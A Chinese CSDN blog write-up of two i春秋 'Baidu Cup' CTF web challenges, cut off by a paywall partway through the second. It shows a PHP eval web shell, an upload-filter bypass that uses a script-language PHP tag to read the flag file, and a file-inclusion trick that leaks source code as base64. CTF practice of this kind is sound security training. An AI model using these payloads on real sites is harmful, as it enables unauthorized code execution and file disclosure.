i春秋 web“百度杯”CTF比赛 九月场-Upload & code

最新推荐文章于 2021-12-24 22:43:37 发布
最新推荐文章于 2021-12-24 22:43:37 发布
阅读量983 收藏 2
点赞数
分类专栏: CTF WP 文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ITmincherry/article/details/102531096
版权
本文详细介绍了参加i春秋web‘百度杯’CTF比赛的Upload和Code两个环节的挑战过程。在Upload部分,通过利用PHP脚本标记绕过过滤获取flag。在Code环节,涉及文件包含漏洞、Base64编码解密以及加密算法的逆向工程,最终通过爆破解密cookie获取flag。
摘要由CSDN通过智能技术生成

Upload

在这里插入图片描述
可以上传文件,并且上传之后可以点击源码链接打开文件,上传了这几句话:

<?php
@eval($POST["code"]);
?>

结果发现<?php被过滤了,于是用php脚本标记来绕过过滤:

<script language="PHP">
$f=fopen("../flag.".strtolower("PHP"),'r');
echo fread($f,filesize("../flag.".strtolower("PHP"))); 
fclose($f);
</script>

查看源码,点击/u/x.php即可得到flag。
这里附上PHP四种标记风格链接https://blog.csdn.net/qq_35085863/article/details/76714367

code 考脑洞,你能过么?

题目打开是一张图片,http://154dd661c59a463aacb5d7f969774e19a5144eb67aee4c93.changame.ichunqiu.com/index.php?jpg=hei.jpg
在这里插入图片描述
看url发现可能是文件包含,查看index.php:

http://154dd661c59a463aacb5d7f969774e19a5144eb67aee4c93.changame.ichunqiu.com/index.php?jpg=index.php

查看源码,得到一串base64编码

<title>file:index.php</title><img src='data:image/gif;base64,PD9waHANCi8qKg0KICogQ3JlYXRlZCBieSBQaHBTdG9ybS4NCiAqIERhdGU6IDIwMTUvMTEvMTYNCiAqIFRpbWU6IDE6MzENCiAqLw0KaGVhZGVyKCdjb250ZW50LXR5cGU6dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTgnKTsNCmlmKCEgaXNzZXQoJF9HRVRbJ2pwZyddKSkNCiAgICBoZWFkZXIoJ1JlZnJlc2g6MDt1cmw9Li9pbmRleC5waHA/anBnPWhlaS5qcGcnKTsNCiRmaWxlID0gJF9HRVRbJ2pwZyddOw0KZWNobyAnPHRpdGxlPmZpbGU6Jy4kZmlsZS4nPC90aXRsZT4nOw0KJGZpbGUgPSBwcmVnX3JlcGxhY2UoIi9bXmEtekEtWjAtOS5dKy8iLCIiLCAkZmlsZSk7DQokZmlsZSA9IHN0cl9yZXBsYWNlKCJjb25maWciLCJfIiwgJGZpbGUpOw0KJHR4dCA9IGJhc2U2NF9lbmNvZGUoZmlsZV9nZXRfY29udGVudHMoJGZpbGUpKTsNCg0KZWNobyAiPGltZyBzcmM9J2RhdGE6aW1hZ2UvZ2lmO2Jhc2U2NCwiLiR0eHQuIic+PC9pbWc+IjsNCg0KLyoNCiAqIENhbiB5b3UgZmluZCB0aGUgZmxhZyBmaWxlPw0KICoNCiAqLw0KDQo/Pg=='></img>

解码之后,得到

<?php
/**
 * Created by PhpStorm.
 * Date: 2015/11/16
 * Time: 1:31
 */
header('content-type:text/html;charset=utf-8');
if(! isset($_GET['jpg']))
    header('Refresh:0;url=./index.php?jpg=hei.jpg');
$file = $_GET['jpg'];
echo '<title>file:'.$file.'</title>';
$file = preg_replace("/[^a-zA-Z0-9.]+/","", $file);
$file = str_replace("config",
最低0.47元/天 解锁文章
ChanCherry、
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
python跨文件传输变量
cuicui_ruirui的博客
09-15 3131
假设有两个文件file1.py,file4.py。file4.py文件需要调用file1.py文件中的某个变量。 file4.py与file1.py之间是通过文件中的函数相关联的,其中file1.py需要经过三个文件file2.py,file3.py,file4.py之间的相互关系才能到达file4.py。 原代码是 file1: class LabanWidget(BVHPlayerPy): def loadFile(self): str=cal.Calcula
百度CTF比赛 九月-web-Code
wallacegen的博客
05-30 252
i春秋平台上有环境 打开之后是一张图片,查看网页源码,发现图片的src后面跟了一大堆base64,这种格式在Data URI scheme有规定。 关于Data URI scheme,可参考这篇文章 图片的base64不用拿出去解码,因为是图片的二进制表示,所以解码也没有意义。 既然请求可以获取图片,这有点像ssrf,那么能不能请求一些敏感的文件呢? 首先请求index.php,?jpg=index.php,发现是有数据的,base64解码得到如下代码,注释如下 <?php /** * Create
i 春秋CTF题目 百度 9月 再见CMS Upload 复现
AAAAAAAAAAAA66的博客
12-24 1526
今天花了点时间刷了下题目,遇到几道相对来说进阶的题目,学习一下储备一些CTF思路,这些题。。脑洞有点开。 再见CMS 昨天刚做一道 [WEB攻防] i春秋- “百度CTF比赛 十二月-YeserCMS cmseasy CmsEasy_5.6_20151009 无限制报错注入 复现过程_AAAAAAAAAAAA66的博客-CSDN博客 今天继续按着套路来 直接在线CMS指纹识别 百度找到payload ,都是些过了很久的漏洞了 这里简单知道是一个注入漏洞就行了,我们的目的是照着pa
i春秋WEB CTF 1
cbhjerry的博客
10-23 1713
题1:爆破-1,flag就在某六位变量中 &lt;?php include"flag.php"; $a=@$_REQUEST['hello']; if(!preg_match('/^\w*$/',$a)){ die('ERROR'); } eval("var_dump($$a);"); show_source(__FILE__); ?&gt; 解题:URL/?hello=GLO...
百度CTF比赛 九月------code
大方子
08-16 3082
============================= 个人收获: 1.phpstorm创建的文件会自动穿件idea,里面的workspace.xml会保存目录结构 2.URL文件包含要多注意   =============================   题目:   刚开始以为是隐写,保存到本地打开看没有什么奇怪的地方,打开源码也很正常 但是URL的连接引起我...
i春秋百度CTF比赛 九月 Code
include_heqile的博客
09-06 689
Code 这道题打开是一张图片,然后我们可以修改POST数据,将jpg=hei.jpg改为jpg=index.php,查看页面源代码,我们发现了base64编码的数据,将其解码,即可得到index.php的源代码: &amp;amp;amp;amp;amp;amp;amp;lt;?php /** * Created by PhpStorm. * Date: 2015/11/16 * Time: 1:31 */ header('content...
百度CTF比赛二月第三比赛(Reverse专题赛)的CrackMe-1题目
03-30
百度CTF比赛二月第三比赛(Reverse专题赛)的CrackMe-1题目。
ctf-all-in-one
最新发布
01-30
ctf-all-in-one
CTF比赛编码工具Captfencoder-1.3.0
09-21
Web Encoding Hex Encoding Unicode Encoding Base64(Base16、Base32、Base58) Url Encoding Html Entity Encoding Escape Encoding Quoted-printable(可打印字符引用编码) Morse Code(莫尔斯电码) ...
i春秋 CTF大本营 竞赛训练营 200+道题目答案
03-30
i春秋 CTF大本营 竞赛训练营 200+道题目答案 竞赛包括冬令营白帽黑客专项训练赛之春秋等 国内比较好的安全知识在线学习平台,把复杂的操作系统、工具和网络环境完整的在网页进行重现,为学习者提供完全贴近实际...
CTF 竞赛入门指南(ctf-all-in-one).pdf
09-07
一、基础篇;二、工具篇;三、分类专题篇;四、技巧篇;五、高级篇;六、题解篇;七、实战篇... 2000多页的电子书,讲解细致,值得搜藏。
百度CTF比赛 九月 考脑洞,你能过么?python3
weixin_42357645的博客
11-14 353
考脑洞,你能过么?python3 “百度CTF比赛 九月 Writeup 题解 0x01 changame.ichunqiu.com/index.php?jpg=hei.jpg 根据url格式就想试一下jpg=index.php 浏览器F12查看源码img标签似乎是base64 直接上python3代码 #ready import requests import re import base64 from time import sleep urlPart1='9fa9f9800df645d298a2
百度CTF比赛 九月——Web-Upload
大方子
08-06 1596
============================= 个人收获: 1.PHP标记的不同写法 2.PHP标记被过滤可以试试大小写 ==============================     不知道为什么写这篇文章的时候CSDN的服务器出现问题一直无法上传图片,索性就不传了,因为这题挺简单的。   题目开始是说让我们随便上传文件,那么我们找个一句话直接上传 &lt...
百度CTF比赛 九月——Code
Ifish的博客
08-07 2640
题目描述 解题思路 1、打开题目链接,看到url,感觉应该是文件包含 查看源码,看到了图片的base64编码 2、感觉思路比较清晰,构造 index.php?jpg=index.php,查看源码,得到base64编码,解码,得到index.php的源码 &amp;lt;?php /** * Created by PhpStorm. * Date: 2015/11/16...
百度CTF比赛 九月 类型:Web 题目名称:SQLi
大方子
08-01 2791
收获的知识: 重定向一般发生在访问域名而且不加参数或者文件夹名,文件名这样的情况下 sql注入也要留意HTTP信息的变化 可以利用SQL map跑一下看看有没有有用的信息 不使用单引号和逗号的注入的注入技巧       发现页面空白 然后查看源文件 发现另一个页面 进去后出现   后来手测和用sqlmap跑感觉这不是一个注入点 看了别人的writeup之后发现...
百度CTF比赛 九月 Upload解题思路
qq_43473164的博客
05-16 1776
Hello,大家好,我是锘锘鸡。 今天分享给大家的是百度CTF比赛Upload解题思路。 先看下题目 提示flag就在flag.php中。 进入答题链接 发现是文件上传,于是好奇的锘锘鸡开始了他的第一波操作"题下留名",证明自己来过 上传成功后,锘锘鸡惊奇的发现,上传成功在html中是在a标签中的,而且直接链接到文件目录下。 锘锘鸡试着点开!!!click… 嗯??… 锘锘鸡电灯泡一...
BUUCTF snake(实验吧Snake)
ChanCherry的博客
08-13 5050
题目表面上给的是一张jpg图片,但是binwalk一下,里面有压缩包,binwalk snake.jpg -e解压一下, 里面有两个文件,一个key,一个cipher,打开key,有一串base64字符, V2hhdCBpcyBOaWNraSBNaW5haidzIGZhdm9yaXRlIHNvbmcgdGhhdCByZWZlcnMgdG8gc25ha2VzPwo= 解码之后,得到: What ...
福建闽盾 ctf比赛题目
08-26
福建闽盾CTF比赛题目是指“福建”和“闽盾”这两个关键词所组成的CTF比赛的题目。CTF(Capture The Flag,夺旗赛)是一种网络安全竞赛,旨在考验选手在网络攻防和信息安全方面的技能。 福建作为一个华南沿海...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值